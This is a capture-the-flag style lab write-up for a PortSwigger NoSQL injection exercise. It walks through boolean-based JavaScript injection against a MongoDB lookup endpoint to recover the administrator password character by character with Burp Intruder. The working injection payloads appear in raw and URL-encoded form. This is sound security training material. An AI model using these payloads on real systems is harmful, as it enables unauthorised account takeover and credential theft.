[This lab](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-data) simulates a scenario where a NoSQL injection vulnerability in a **MongoDB-powered user lookup endpoint** allows us to extract the administrator’s password **one character at a time**. By injecting JavaScript logic into the query, we use **boolean-based conditions** to infer password content. ##### Step 1: Confirm Injection in Lookup Endpoint Logged in as `wiener:peter`. Captured this request in **Proxy > HTTP history**: ``` GET /user/lookup?user=wiener ``` Sent to **Repeater**, changed to: ``` /user/lookup?user=wiener' ``` → Response: **Syntax error** ✅ Tested a safe payload: ``` /user/lookup?user=wiener'+' ``` (URL-encoded as `wiener%27+%27`) → Response: user details returned ✅ Confirms that we are injecting into a live JavaScript query. ![[CleanShot 2025-04-14 at 20.52.04.png]] --- ##### Step 2: Confirm Boolean Injection Injected a false condition: ``` wiener' && '1'=='2 ``` Encoded: `wiener%27%20%26%26%20%271%27%3D%3D%272` → Response: **Could not find user** Injected a true condition: ``` wiener' && '1'=='1 ``` Encoded: `wiener%27%20%26%26%20%271%27%3D%3D%271` → Response: user details returned ✅ Injection working — response content differs based on boolean logic. --- ### 🔐 Step 3: Find Administrator Password Length Used payload: ``` administrator' && this.password.length < 30 || 'a'=='b ``` Reduced number until false condition triggered. Final result: - `this.password.length < 9` → true - `this.password.length < 8` → false ✅ Password is **8 characters** long TIP: You can easily modify the value in **Inspector**: ![[CleanShot 2025-04-14 at 20.53.48.png]] ##### Step 4: Launch Boolean Brute-Force Attack in Intruder #### Set Up Payload: Injected: ``` administrator' && this.password[§0§]=='§a§ ``` Then **URL-encoded all characters**: ``` administrator%27%20%26%26%20this.password%5B§0§%5D%3D%3D%27§a§ ``` - **Position 1** (index): 0 to 7 - **Position 2** (letter): a to z Selected **Cluster bomb** attack type → Launched the attack ![[CleanShot 2025-04-14 at 21.11.01.png]] --- ##### Step 5: Extract Password Sorted by **response length**. At each character index (0–7), the correct letter causes the server to return **valid user info** (longer response). Collected letters from position 2 for matching responses → Assembled password. ✅ Example result (will vary): `zrmqcjpw` --- ##### Step 6: Log in as Administrator Entered `administrator` and the extracted password in the login form. → Successfully logged in